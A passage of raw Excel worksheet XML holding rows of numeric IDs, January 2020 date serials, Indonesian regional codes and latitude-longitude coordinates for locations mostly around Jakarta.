      </c>
      <c r="V232" s="5" t="s">
        <v>14672</v>
      </c>
      <c r="W232" s="5">
        <v>-623844</v>
      </c>
      <c r="X232" t="s">
        <v>18482</v>
      </c>
      <c r="Y232" t="str">
        <f t="shared" si="3"/>
        <v>-6.23844,106.86730</v>
      </c>
    </row>
    <row r="233" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A233">
        <v>99764</v>
      </c>
      <c r="B233" s="1">
        <v>43832</v>
      </c>
      <c r="C233" s="2">
        <v>0.16685185185185183</v>
      </c>
      <c r="D233" t="s">
        <v>22</v>
      </c>
      <c r="E233" t="s">
        <v>23</v>
      </c>
      <c r="F233" t="s">
        <v>1113</v>
      </c>
      <c r="G233" t="s">
        <v>1114</v>
      </c>
      <c r="H233" t="s">
        <v>26</v>
      </c>
      <c r="I233" t="s">
        <v>487</v>
      </c>
      <c r="J233" t="s">
        <v>1100</v>
      </c>
      <c r="L233" t="s">
        <v>1115</v>
      </c>
      <c r="M233">
        <v>3172090007</v>
      </c>
      <c r="N233">
        <v>3172090</v>
      </c>
      <c r="O233">
        <v>3172</v>
      </c>
      <c r="P233">
        <v>31</v>
      </c>
      <c r="Q233" t="s">
        <v>890</v>
      </c>
      <c r="R233" t="s">
        <v>890</v>
      </c>
      <c r="S233" t="s">
        <v>49</v>
      </c>
      <c r="T233" t="s">
        <v>33</v>
      </c>
      <c r="U233" s="5">
        <v>10689664</v>
      </c>
      <c r="V233" s="5" t="s">
        <v>14673</v>
      </c>
      <c r="W233" s="5">
        <v>-618005</v>
      </c>
      <c r="X233" t="s">
        <v>18483</v>
      </c>
      <c r="Y233" t="str">
        <f t="shared" si="3"/>
        <v>-6.18005,106.89664</v>
      </c>
    </row>
    <row r="234" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A234">
        <v>99769</v>
      </c>
      <c r="B234" s="1">
        <v>43832</v>
      </c>
      <c r="C234" s="2">
        <v>0.13586805555555556</v>
      </c>
      <c r="D234" t="s">
        <v>85</v>
      </c>
      <c r="E234" t="s">
        <v>23</v>
      </c>
      <c r="F234" t="s">
        <v>1116</v>
      </c>
      <c r="G234" t="s">
        <v>1117</v>
      </c>
      <c r="H234" t="s">
        <v>26</v>
      </c>
      <c r="J234" t="s">
        <v>1118</v>
      </c>
      <c r="K234" t="s">
        <v>1119</v>
      </c>
      <c r="L234" t="s">
        <v>1120</v>
      </c>
      <c r="M234">
        <v>3171100006</v>
      </c>
      <c r="N234">
        <v>3171100</v>
      </c>
      <c r="O234">
        <v>3171</v>
      </c>
      <c r="P234">
        <v>31</v>
      </c>
      <c r="Q234" t="s">
        <v>1121</v>
      </c>
      <c r="R234" t="s">
        <v>107</v>
      </c>
      <c r="S234" t="s">
        <v>108</v>
      </c>
      <c r="T234" t="s">
        <v>33</v>
      </c>
      <c r="U234" s="5">
        <v>10684420</v>
      </c>
      <c r="V234" s="5" t="s">
        <v>14674</v>
      </c>
      <c r="W234" s="5">
        <v>-621009</v>
      </c>
      <c r="X234" t="s">
        <v>18484</v>
      </c>
      <c r="Y234" t="str">
        <f t="shared" si="3"/>
        <v>-6.21009,106.84420</v>
      </c>
    </row>
    <row r="235" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A235">
        <v>99774</v>
      </c>
      <c r="B235" s="1">
        <v>43832</v>
      </c>
      <c r="C235" s="2">
        <v>0.14326388888888889</v>
      </c>
      <c r="D235" t="s">
        <v>85</v>
      </c>
      <c r="E235" t="s">
        <v>23</v>
      </c>
      <c r="F235" t="s">
        <v>1122</v>
      </c>
      <c r="G235" t="s">
        <v>1123</v>
      </c>
      <c r="H235" t="s">
        <v>26</v>
      </c>
      <c r="J235" t="s">
        <v>37</v>
      </c>
      <c r="K235" t="s">
        <v>1124</v>
      </c>
      <c r="L235" t="s">
        <v>1125</v>
      </c>
      <c r="M235">
        <v>3275060001</v>
      </c>
      <c r="N235">
        <v>3275060</v>
      </c>
      <c r="O235">
        <v>3275</v>
      </c>
      <c r="P235">
        <v>32</v>
      </c>
      <c r="Q235" t="s">
        <v>611</v>
      </c>
      <c r="R235" t="s">
        <v>114</v>
      </c>
      <c r="S235" t="s">
        <v>41</v>
      </c>
      <c r="T235" t="s">
        <v>42</v>
      </c>
      <c r="U235" s="5">
        <v>10694958</v>
      </c>
      <c r="V235" s="5" t="s">
        <v>14559</v>
      </c>
      <c r="W235" s="5">
        <v>-624634</v>
      </c>
      <c r="X235" t="s">
        <v>18372</v>
      </c>
      <c r="Y235" t="str">
        <f t="shared" si="3"/>
        <v>-6.24634,106.94958</v>
      </c>
    </row>
    <row r="236" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A236">
        <v>99778</v>
      </c>
      <c r="B236" s="1">
        <v>43832</v>
      </c>
      <c r="C236" s="2">
        <v>0.14938657407407407</v>
      </c>
      <c r="D236" t="s">
        <v>85</v>
      </c>
      <c r="E236" t="s">
        <v>23</v>
      </c>
      <c r="F236" t="s">
        <v>1126</v>
      </c>
      <c r="G236" t="s">
        <v>1127</v>
      </c>
      <c r="H236" t="s">
        <v>26</v>
      </c>
      <c r="J236" t="s">
        <v>1128</v>
      </c>
      <c r="K236" t="s">
        <v>1129</v>
      </c>
      <c r="L236" t="s">
        <v>1130</v>
      </c>
      <c r="M236">
        <v>3306130007</v>
      </c>
      <c r="N236">
        <v>3306130</v>
      </c>
      <c r="O236">
        <v>3306</v>
      </c>
      <c r="P236">
        <v>33</v>
      </c>
      <c r="Q236" t="s">
        <v>1131</v>
      </c>
      <c r="R236" t="s">
        <v>1132</v>
      </c>
      <c r="S236" t="s">
        <v>1133</v>
      </c>
      <c r="T236" t="s">
        <v>1134</v>
      </c>
      <c r="U236" s="5">
        <v>10988884</v>
      </c>
      <c r="V236" s="5" t="s">
        <v>14675</v>
      </c>
      <c r="W236" s="5">
        <v>-755802</v>
      </c>
      <c r="X236" t="s">
        <v>18485</v>
      </c>
      <c r="Y236" t="str">
        <f t="shared" si="3"/>
        <v>-7.55802,109.88884</v>
      </c>
    </row>
    <row r="237" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A237">
        <v>99791</v>
      </c>
      <c r="B237" s="1">
        <v>43832</v>
      </c>
      <c r="C237" s="2">
        <v>0.17282407407407407</v>
      </c>
      <c r="D237" t="s">
        <v>22</v>
      </c>
      <c r="E237" t="s">
        <v>23</v>
      </c>
      <c r="F237" t="s">
        <v>1135</v>
      </c>
      <c r="H237" t="s">
        <v>26</v>
      </c>
      <c r="I237" t="s">
        <v>1136</v>
      </c>
      <c r="J237" t="s">
        <v>1137</v>
      </c>
      <c r="L237" t="s">
        <v>1138</v>
      </c>
      <c r="M237">
        <v>3174020005</v>
      </c>
      <c r="N237">
        <v>3174020</v>
      </c>
      <c r="O237">
        <v>3174</v>
      </c>
      <c r="P237">
        <v>31</v>
      </c>
      <c r="Q237" t="s">
        <v>30</v>
      </c>
      <c r="R237" t="s">
        <v>31</v>
      </c>
      <c r="S237" t="s">
        <v>32</v>
      </c>
      <c r="T237" t="s">
        <v>33</v>
      </c>
      <c r="U237" s="5">
        <v>10677952</v>
      </c>
      <c r="V237" s="5" t="s">
        <v>14676</v>
      </c>
      <c r="W237" s="5">
        <v>-618047</v>
      </c>
      <c r="X237" t="s">
        <v>18486</v>
      </c>
      <c r="Y237" t="str">
        <f t="shared" si="3"/>
        <v>-6.18047,106.77952</v>
      </c>
    </row>
    <row r="238" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A238">
        <v>99816</v>
      </c>
      <c r="B238" s="1">
        <v>43832</v>
      </c>
      <c r="C238" s="2">
        <v>0.17643518518518519</v>
      </c>
      <c r="D238" t="s">
        <v>22</v>
      </c>
      <c r="E238" t="s">
        <v>23</v>
      </c>
      <c r="F238" t="s">
        <v>1139</v>
      </c>
      <c r="G238" t="s">
        <v>1140</v>
      </c>
      <c r="H238" t="s">
        <v>26</v>
      </c>
      <c r="I238" t="s">
        <v>1141</v>
      </c>
      <c r="J238" t="s">
        <v>648</v>
      </c>
      <c r="L238" t="s">
        <v>1142</v>
      </c>
      <c r="M238">
        <v>3174020005</v>
      </c>
      <c r="N238">
        <v>3174020</v>
      </c>
      <c r="O238">
        <v>3174</v>
      </c>
      <c r="P238">
        <v>31</v>
      </c>
      <c r="Q238" t="s">
        <v>30</v>
      </c>
      <c r="R238" t="s">
        <v>31</v>
      </c>
      <c r="S238" t="s">
        <v>32</v>
      </c>
      <c r="T238" t="s">
        <v>33</v>
      </c>
      <c r="U238" s="5">
        <v>10677771</v>
      </c>
      <c r="V238" s="5" t="s">
        <v>14677</v>
      </c>
      <c r="W238" s="5">
        <v>-617150</v>
      </c>
      <c r="X238" t="s">
        <v>18487</v>
      </c>
      <c r="Y238" t="str">
        <f t="shared" si="3"/>
        <v>-6.17150,106.77771</v>
      </c>
    </row>
    <row r="239" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A239">
        <v>99821</v>
      </c>
      <c r="B239" s="1">
        <v>43832</v>
      </c>
      <c r="C239" s="2">
        <v>0.17780092592592592</v>
      </c>
      <c r="D239" t="s">
        <v>22</v>
      </c>
      <c r="E239" t="s">
        <v>23</v>
      </c>
      <c r="F239" t="s">
        <v>1143</v>
      </c>
      <c r="H239" t="s">
        <v>26</v>
      </c>
      <c r="I239" t="s">
        <v>1144</v>
      </c>
      <c r="J239" t="s">
        <v>930</v>
      </c>
      <c r="L239" t="s">
        <v>1145</v>
      </c>
      <c r="M239">
        <v>3174070002</v>
      </c>
      <c r="N239">
        <v>3174070</v>
      </c>
      <c r="O239">
        <v>3174</v>
      </c>
      <c r="P239">
        <v>31</v>
      </c>
      <c r="Q239" t="s">
        <v>621</v>
      </c>
      <c r="R239" t="s">
        <v>84</v>
      </c>
      <c r="S239" t="s">
        <v>32</v>
      </c>
      <c r="T239" t="s">
        <v>33</v>
      </c>
      <c r="U239" s="5">
        <v>10672743</v>
      </c>
      <c r="V239" s="5" t="s">
        <v>14678</v>
      </c>
      <c r="W239" s="5">
        <v>-616466</v>
      </c>
      <c r="X239" t="s">
        <v>18397</v>
      </c>
      <c r="Y239" t="str">
        <f t="shared" si="3"/>
        <v>-6.16466,106.72743</v>
      </c>
    </row>
    <row r="240" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A240">
        <v>99854</v>
      </c>
      <c r="B240" s="1">
        <v>43832</v>
      </c>
      <c r="C240" s="2">
        <v>0.1807175925925926</v>
      </c>
      <c r="D240" t="s">
        <v>22</v>
      </c>
      <c r="E240" t="s">
        <v>23</v>
      </c>
      <c r="F240" t="s">
        <v>1146</v>
      </c>
      <c r="G240" t="s">
        <v>1147</v>
      </c>
      <c r="H240" t="s">
        <v>26</v>
      </c>
      <c r="I240" t="s">
        <v>65</v>
      </c>
      <c r="J240" t="s">
        <v>1148</v>
      </c>
      <c r="L240" t="s">
        <v>1149</v>
      </c>
      <c r="M240">
        <v>3174070001</v>
      </c>
      <c r="N240">
        <v>3174070</v>
      </c>
      <c r="O240">
        <v>3174</v>
      </c>
      <c r="P240">
        <v>31</v>
      </c>
      <c r="Q240" t="s">
        <v>83</v>
      </c>
      <c r="R240" t="s">
        <v>84</v>
      </c>
      <c r="S240" t="s">
        <v>32</v>
      </c>
      <c r="T240" t="s">
        <v>33</v>
      </c>
      <c r="U240" s="5">
        <v>10671726</v>
      </c>
      <c r="V240" s="5" t="s">
        <v>14679</v>
      </c>
      <c r="W240" s="5">
        <v>-616840</v>
      </c>
      <c r="X240" t="s">
        <v>18488</v>
      </c>
      <c r="Y240" t="str">
        <f t="shared" si="3"/>
        <v>-6.16840,106.71726</v>
      </c>
    </row>
    <row r="241" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A241">
        <v>99899</v>
      </c>
      <c r="B241" s="1">
        <v>43832</v>
      </c>
      <c r="C241" s="2">
        <v>0.18214120370370371</v>
      </c>
      <c r="D241" t="s">
        <v>85</v>
      </c>
      <c r="E241" t="s">
        <v>23</v>
      </c>
      <c r="F241" t="s">
        <v>1150</v>
      </c>
      <c r="G241" t="s">
        <v>1151</v>
      </c>
      <c r="H241" t="s">
        <v>26</v>
      </c>
      <c r="I241" t="s">
        <v>103</v>
      </c>
      <c r="J241" t="s">
        <v>1152</v>
      </c>
      <c r="K241" t="s">
        <v>1153</v>
      </c>
      <c r="L241" t="s">
        <v>1154</v>
      </c>
      <c r="M241">
        <v>3173070001</v>
      </c>
      <c r="N241">
        <v>3173070</v>
      </c>
      <c r="O241">
        <v>3173</v>
      </c>
      <c r="P241">
        <v>31</v>
      </c>
      <c r="Q241" t="s">
        <v>322</v>
      </c>
      <c r="R241" t="s">
        <v>323</v>
      </c>
      <c r="S241" t="s">
        <v>62</v>
      </c>
      <c r="T241" t="s">
        <v>33</v>
      </c>
      <c r="U241" s="5">
        <v>10683513</v>
      </c>
      <c r="V241" s="5" t="s">
        <v>14680</v>
      </c>
      <c r="W241" s="5">
        <v>-616577</v>
      </c>
      <c r="X241" t="s">
        <v>18489</v>
      </c>
      <c r="Y241" t="str">
        <f t="shared" si="3"/>
        <v>-6.16577,106.83513</v>
      </c>
    </row>
    <row r="242" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A242">
        <v>101826</v>
      </c>
      <c r="B242" s="1">
        <v>43833</v>
      </c>
      <c r="C242" s="2">
        <v>2.5578703703703704E-2</v>
      </c>
      <c r="D242" t="s">
        <v>22</v>
      </c>
      <c r="E242" t="s">
        <v>23</v>
      </c>
      <c r="F242" t="s">
        <v>1155</v>
      </c>
      <c r="G242" t="s">
        <v>1156</v>
      </c>
      <c r="H242" t="s">
        <v>26</v>
      </c>
      <c r="I242" t="s">
        <v>1157</v>
      </c>
      <c r="J242" t="s">
        <v>1158</v>
      </c>
      <c r="L242" t="s">
        <v>1159</v>
      </c>
      <c r="M242">
        <v>3174010002</v>
      </c>
      <c r="N242">
        <v>3174010</v>
      </c>
      <c r="O242">
        <v>3174</v>
      </c>
      <c r="P242">
        <v>31</v>
      </c>
      <c r="Q242" t="s">
        <v>514</v>
      </c>
      <c r="R242" t="s">
        <v>69</v>
      </c>
      <c r="S242" t="s">
        <v>32</v>
      </c>
      <c r="T242" t="s">
        <v>33</v>
      </c>
      <c r="U242" s="5">
        <v>10676215</v>
      </c>
      <c r="V242" s="5" t="s">
        <v>14681</v>
      </c>
      <c r="W242" s="5">
        <v>-619909</v>
      </c>
      <c r="X242" t="s">
        <v>18490</v>
      </c>
      <c r="Y242" t="str">
        <f t="shared" si="3"/>
        <v>-6.19909,106.76215</v>
      </c>
    </row>
    <row r="243" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A243">
        <v>101827</v>
      </c>
      <c r="B243" s="1">
        <v>43833</v>
      </c>
      <c r="C243" s="2">
        <v>6.9675925925925933E-2</v>
      </c>
      <c r="D243" t="s">
        <v>22</v>
      </c>
      <c r="E243" t="s">
        <v>23</v>
      </c>
      <c r="F243" t="s">
        <v>1160</v>
      </c>
      <c r="H243" t="s">
        <v>26</v>
      </c>
      <c r="I243" t="s">
        <v>1161</v>
      </c>
      <c r="J243" t="s">
        <v>629</v>
      </c>
      <c r="L243" t="s">
        <v>1162</v>
      </c>
      <c r="M243">
        <v>3174040007</v>
      </c>
      <c r="N243">
        <v>3174040</v>
      </c>
      <c r="O243">
        <v>3174</v>
      </c>
      <c r="P243">
        <v>31</v>
      </c>
      <c r="Q243" t="s">
        <v>389</v>
      </c>
      <c r="R243" t="s">
        <v>377</v>
      </c>
      <c r="S243" t="s">
        <v>32</v>
      </c>
      <c r="T243" t="s">
        <v>33</v>
      </c>
      <c r="U243" s="5">
        <v>10678326</v>
      </c>
      <c r="V243" s="5" t="s">
        <v>14682</v>
      </c>
      <c r="W243" s="5">
        <v>-614470</v>
      </c>
      <c r="X243" t="s">
        <v>18491</v>
      </c>
      <c r="Y243" t="str">
        <f t="shared" si="3"/>
        <v>-6.14470,106.78326</v>
      </c>
    </row>
    <row r="244" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A244">
        <v>101828</v>
      </c>
      <c r="B244" s="1">
        <v>43833</v>
      </c>
      <c r="C244" s="2">
        <v>7.329861111111112E-2</v>
      </c>
      <c r="D244" t="s">
        <v>22</v>
      </c>
      <c r="E244" t="s">
        <v>23</v>
      </c>
      <c r="F244" t="s">
        <v>1163</v>
      </c>
      <c r="G244" t="s">
        <v>1164</v>
      </c>
      <c r="H244" t="s">
        <v>26</v>
      </c>
      <c r="I244" t="s">
        <v>1165</v>
      </c>
      <c r="J244" t="s">
        <v>28</v>
      </c>
      <c r="L244" t="s">
        <v>1166</v>
      </c>
      <c r="M244">
        <v>3174020005</v>
      </c>
      <c r="N244">
        <v>3174020</v>
      </c>
      <c r="O244">
        <v>3174</v>
      </c>
      <c r="P244">
        <v>31</v>
      </c>
      <c r="Q244" t="s">
        <v>30</v>
      </c>
      <c r="R244" t="s">
        <v>31</v>
      </c>
      <c r="S244" t="s">
        <v>32</v>
      </c>
      <c r="T244" t="s">
        <v>33</v>
      </c>
      <c r="U244" s="5">
        <v>10676937</v>
      </c>
      <c r="V244" s="5" t="s">
        <v>14683</v>
      </c>
      <c r="W244" s="5">
        <v>-617042</v>
      </c>
      <c r="X244" t="s">
        <v>18492</v>
      </c>
      <c r="Y244" t="str">
        <f t="shared" si="3"/>
        <v>-6.17042,106.76937</v>
      </c>
    </row>
    <row r="245" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A245">
        <v>101829</v>
      </c>
      <c r="B245" s="1">
        <v>43833</v>
      </c>
      <c r="C245" s="2">
        <v>9.8425925925925917E-2</v>
      </c>
      <c r="D245" t="s">
        <v>22</v>
      </c>
      <c r="E245" t="s">
        <v>23</v>
      </c>
      <c r="F245" t="s">
        <v>1167</v>
      </c>
      <c r="G245" t="s">
        <v>1168</v>
      </c>
      <c r="H245" t="s">
        <v>26</v>
      </c>
      <c r="I245" t="s">
        <v>1169</v>
      </c>
      <c r="J245" t="s">
        <v>1170</v>
      </c>
      <c r="L245" t="s">
        <v>1171</v>
      </c>
      <c r="M245">
        <v>3171020002</v>
      </c>
      <c r="N245">
        <v>3171020</v>
      </c>
      <c r="O245">
        <v>3171</v>
      </c>
      <c r="P245">
        <v>31</v>
      </c>
      <c r="Q245" t="s">
        <v>1172</v>
      </c>
      <c r="R245" t="s">
        <v>484</v>
      </c>
      <c r="S245" t="s">
        <v>108</v>
      </c>
      <c r="T245" t="s">
        <v>33</v>
      </c>
      <c r="U245" s="5">
        <v>10682113</v>
      </c>
      <c r="V245" s="5" t="s">
        <v>14684</v>
      </c>
      <c r="W245" s="5">
        <v>-631195</v>
      </c>
      <c r="X245" t="s">
        <v>18493</v>
      </c>
      <c r="Y245" t="str">
        <f t="shared" si="3"/>
        <v>-6.31195,106.82113</v>
      </c>
    </row>
    <row r="246" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A246">
        <v>101830</v>
      </c>
      <c r="B246" s="1">
        <v>43833</v>
      </c>
      <c r="C246" s="2">
        <v>0.1476736111111111</v>
      </c>
      <c r="D246" t="s">
        <v>22</v>
      </c>
      <c r="E246" t="s">
        <v>23</v>
      </c>
      <c r="F246" s="3" t="s">
        <v>1173</v>
      </c>
      <c r="G246" t="s">
        <v>1174</v>
      </c>
      <c r="H246" t="s">
        <v>26</v>
      </c>
      <c r="I246" t="s">
        <v>1175</v>
      </c>
      <c r="J246" t="s">
        <v>858</v>
      </c>
      <c r="L246" t="s">
        <v>1176</v>
      </c>
      <c r="M246">
        <v>3175010003</v>
      </c>
      <c r="N246">
        <v>3175010</v>
      </c>
      <c r="O246">
        <v>3175</v>
      </c>
      <c r="P246">
        <v>31</v>
      </c>
      <c r="Q246" t="s">
        <v>545</v>
      </c>
      <c r="R246" t="s">
        <v>546</v>
      </c>
      <c r="S246" t="s">
        <v>547</v>
      </c>
      <c r="T246" t="s">
        <v>33</v>
      </c>
      <c r="U246" s="5">
        <v>10677824</v>
      </c>
      <c r="V246" s="5" t="s">
        <v>14685</v>
      </c>
      <c r="W246" s="5">
        <v>-613030</v>
      </c>
      <c r="X246" t="s">
        <v>18494</v>
      </c>
      <c r="Y246" t="str">
        <f t="shared" si="3"/>
        <v>-6.13030,106.77824</v>
      </c>
    </row>
    <row r="247" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A247">
        <v>101831</v>
      </c>
      <c r="B247" s="1">
        <v>43833</v>
      </c>
      <c r="C247" s="2">
        <v>0.15128472222222222</v>
      </c>
      <c r="D247" t="s">
        <v>22</v>
      </c>
      <c r="E247" t="s">
        <v>23</v>
      </c>
      <c r="F247" t="s">
        <v>1177</v>
      </c>
      <c r="H247" t="s">
        <v>26</v>
      </c>
      <c r="I247" t="s">
        <v>1178</v>
      </c>
      <c r="J247" t="s">
        <v>793</v>
      </c>
      <c r="L247" t="s">
        <v>1179</v>
      </c>
      <c r="M247">
        <v>3175010002</v>
      </c>
      <c r="N247">
        <v>3175010</v>
      </c>
      <c r="O247">
        <v>3175</v>
      </c>
      <c r="P247">
        <v>31</v>
      </c>
      <c r="Q247" t="s">
        <v>616</v>
      </c>
      <c r="R247" t="s">
        <v>546</v>
      </c>
      <c r="S247" t="s">
        <v>547</v>
      </c>
      <c r="T247" t="s">
        <v>33</v>
      </c>
      <c r="U247" s="5">
        <v>10677338</v>
      </c>
      <c r="V247" s="5" t="s">
        <v>14686</v>
      </c>
      <c r="W247" s="5">
        <v>-613826</v>
      </c>
      <c r="X247" t="s">
        <v>18495</v>
      </c>
      <c r="Y247" t="str">
        <f t="shared" si="3"/>
        <v>-6.13826,106.77338</v>
      </c>
    </row>
    <row r="248" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A248">
        <v>101832</v>
      </c>
      <c r="B248" s="1">
        <v>43833</v>
      </c>
      <c r="C248" s="2">
        <v>0.15633101851851852</v>
      </c>
      <c r="D248" t="s">
        <v>22</v>
      </c>
      <c r="E248" t="s">
        <v>23</v>
      </c>
      <c r="F248" t="s">
        <v>1180</v>
      </c>
      <c r="H248" t="s">
        <v>26</v>
      </c>
      <c r="I248" t="s">
        <v>1181</v>
      </c>
      <c r="J248" t="s">
        <v>1182</v>
      </c>
      <c r="L248" t="s">
        <v>1183</v>
      </c>
      <c r="M248">
        <v>3175010003</v>
      </c>
      <c r="N248">
        <v>3175010</v>
      </c>
      <c r="O248">
        <v>3175</v>
      </c>
      <c r="P248">
        <v>31</v>
      </c>
      <c r="Q248" t="s">
        <v>545</v>
      </c>
      <c r="R248" t="s">
        <v>546</v>
      </c>
      <c r="S248" t="s">
        <v>547</v>
      </c>
      <c r="T248" t="s">
        <v>33</v>
      </c>
      <c r="U248" s="5">
        <v>10677947</v>
      </c>
      <c r="V248" s="5" t="s">
        <v>14687</v>
      </c>
      <c r="W248" s="5">
        <v>-613843</v>
      </c>
      <c r="X248" t="s">
        <v>18496</v>
      </c>
      <c r="Y248" t="str">
        <f t="shared" si="3"/>
        <v>-6.13843,106.77947</v>
      </c>
    </row>
    <row r="249" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A249">
        <v>101833</v>
      </c>
      <c r="B249" s="1">
        <v>43833</v>
      </c>
      <c r="C249" s="2">
        <v>0.17380787037037038</v>
      </c>
      <c r="D249" t="s">
        <v>22</v>
      </c>
      <c r="E249" t="s">
        <v>23</v>
      </c>
      <c r="F249" t="s">
        <v>1184</v>
      </c>
      <c r="G249" t="s">
        <v>1185</v>
      </c>
      <c r="H249" t="s">
        <v>26</v>
      </c>
      <c r="I249" t="s">
        <v>1161</v>
      </c>
      <c r="J249" t="s">
        <v>1148</v>
      </c>
      <c r="M249">
        <v>3174070001</v>
      </c>
      <c r="N249">
        <v>3174070</v>
      </c>
      <c r="O249">
        <v>3174</v>
      </c>
      <c r="P249">
        <v>31</v>
      </c>
      <c r="Q249" t="s">
        <v>83</v>
      </c>
      <c r="R249" t="s">
        <v>84</v>
      </c>
      <c r="S249" t="s">
        <v>32</v>
      </c>
      <c r="T249" t="s">
        <v>33</v>
      </c>
      <c r="U249" s="5">
        <v>10671632</v>
      </c>
      <c r="V249" s="5" t="s">
        <v>14688</v>
      </c>
      <c r="W249" s="5">
        <v>-617153</v>
      </c>
      <c r="X249" t="s">
        <v>18497</v>
      </c>
      <c r="Y249" t="str">
        <f t="shared" si="3"/>
        <v>-6.17153,106.71632</v>
      </c>
    </row>
    <row r="250" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A250">
        <v>101834</v>
      </c>
      <c r="B250" s="1">
        <v>43833</v>
      </c>
      <c r="C250" s="2">
        <v>0.19055555555555556</v>
      </c>
      <c r="D250" t="s">
        <v>22</v>
      </c>
      <c r="E250" t="s">
        <v>23</v>
      </c>
      <c r="F250" t="s">
        <v>1186</v>
      </c>
      <c r="H250" t="s">
        <v>26</v>
      </c>
      <c r="I250" t="s">
        <v>1187</v>
      </c>
      <c r="J250" t="s">
        <v>614</v>
      </c>
      <c r="L250" t="s">
        <v>1188</v>
      </c>
      <c r="M250">
        <v>3175010002</v>
      </c>
      <c r="N250">
        <v>3175010</v>
      </c>
      <c r="O250">
        <v>3175</v>
      </c>
      <c r="P250">
        <v>31</v>
      </c>
      <c r="Q250" t="s">
        <v>616</v>
      </c>
      <c r="R250" t="s">
        <v>546</v>
      </c>
      <c r="S250" t="s">
        <v>547</v>
      </c>
      <c r="T250" t="s">
        <v>33</v>
      </c>
      <c r="U250" s="5">
        <v>10677275</v>
      </c>
      <c r="V250" s="5" t="s">
        <v>14689</v>
      </c>
      <c r="W250" s="5">
        <v>-613312</v>
      </c>
      <c r="X250" t="s">
        <v>18498</v>
      </c>
      <c r="Y250" t="str">
        <f t="shared" si="3"/>
        <v>-6.13312,106.77275</v>
      </c>
    </row>
    <row r="251" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A251">
        <v>101835</v>
      </c>
      <c r="B251" s="1">
        <v>43833</v>
      </c>
      <c r="C251" s="2">
        <v>0.23818287037037036</v>
      </c>
      <c r="D251" t="s">
        <v>22</v>
      </c>
      <c r="E251" t="s">
        <v>23</v>
      </c>
      <c r="F251" t="s">
        <v>1189</v>
      </c>
      <c r="H251" t="s">
        <v>26</v>
      </c>
      <c r="I251" t="s">
        <v>1190</v>
      </c>
      <c r="J251" t="s">
        <v>543</v>
      </c>
      <c r="L251" t="s">
        <v>1191</v>
      </c>
      <c r="M251">
        <v>3175010003</v>
      </c>
      <c r="N251">
        <v>3175010</v>
      </c>
      <c r="O251">
        <v>3175</v>
      </c>
      <c r="P251">
        <v>31</v>
      </c>
      <c r="Q251" t="s">
        <v>545</v>
      </c>
      <c r="R251" t="s">
        <v>546</v>
      </c>
      <c r="S251" t="s">
        <v>547</v>
      </c>
      <c r="T251" t="s">
        <v>33</v>
      </c>
      <c r="U251" s="5">
        <v>10677983</v>
      </c>
      <c r="V251" s="5" t="s">
        <v>14653</v>
      </c>
      <c r="W251" s="5">
        <v>-613700</v>
      </c>
      <c r="X251" t="s">
        <v>18499</v>
      </c>
      <c r="Y251" t="str">
        <f t="shared" si="3"/>
        <v>-6.13700,106.77983</v>
      </c>
    </row>
    <row r="252" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A252">
        <v>101836</v>
      </c>
      <c r="B252" s="1">
        <v>43833</v>
      </c>
      <c r="C252" s="2">
        <v>0.24226851851851852</v>
      </c>
      <c r="D252" t="s">
        <v>22</v>
      </c>
      <c r="E252" t="s">
        <v>23</v>
      </c>
      <c r="F252" t="s">
        <v>1192</v>
      </c>
      <c r="G252" t="s">
        <v>1193</v>
      </c>
      <c r="H252" t="s">
        <v>26</v>
      </c>
      <c r="I252" t="s">
        <v>1194</v>
      </c>
      <c r="J252" t="s">
        <v>1195</v>
      </c>
      <c r="L252" t="s">
        <v>1196</v>
      </c>
      <c r="M252">
        <v>3174070004</v>
      </c>
      <c r="N252">
        <v>3174070</v>
      </c>
      <c r="O252">
        <v>3174</v>
      </c>
      <c r="P252">
        <v>31</v>
      </c>
      <c r="Q252" t="s">
        <v>926</v>
      </c>
      <c r="R252" t="s">
        <v>84</v>
      </c>
      <c r="S252" t="s">
        <v>32</v>
      </c>
      <c r="T252" t="s">
        <v>33</v>
      </c>
      <c r="U252" s="5">
        <v>10677110</v>
      </c>
      <c r="V252" s="5" t="s">
        <v>14603</v>
      </c>
      <c r="W252" s="5">
        <v>-614137</v>
      </c>
      <c r="X252" t="s">
        <v>18500</v>
      </c>
      <c r="Y252" t="str">
        <f t="shared" si="3"/>
        <v>-6.14137,106.77110</v>
      </c>
    </row>
    <row r="253" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A253">
        <v>101837</v>
      </c>
      <c r="B253" s="1">
        <v>43833</v>
      </c>
      <c r="C253" s="2">
        <v>0.25652777777777774</v>
      </c>
      <c r="D253" t="s">
        <v>22</v>
      </c>
      <c r="E253" t="s">
        <v>23</v>
      </c>
      <c r="F253" t="s">
        <v>1197</v>
      </c>
      <c r="G253" t="s">
        <v>1198</v>
      </c>
      <c r="H253" t="s">
        <v>26</v>
      </c>
      <c r="I253" t="s">
        <v>628</v>
      </c>
      <c r="J253" t="s">
        <v>644</v>
      </c>
      <c r="M253">
        <v>3174070002</v>
      </c>
      <c r="N253">
        <v>3174070</v>
      </c>
      <c r="O253">
        <v>3174</v>
      </c>
      <c r="P253">
        <v>31</v>
      </c>
      <c r="Q253" t="s">
        <v>621</v>
      </c>
      <c r="R253" t="s">
        <v>84</v>
      </c>
      <c r="S253" t="s">
        <v>32</v>
      </c>
      <c r="T253" t="s">
        <v>33</v>
      </c>
      <c r="U253" s="5">
        <v>10674590</v>
      </c>
      <c r="V253" s="5" t="s">
        <v>14690</v>
      </c>
      <c r="W253" s="5">
        <v>-616237</v>
      </c>
      <c r="X253" t="s">
        <v>18501</v>
      </c>
      <c r="Y253" t="str">
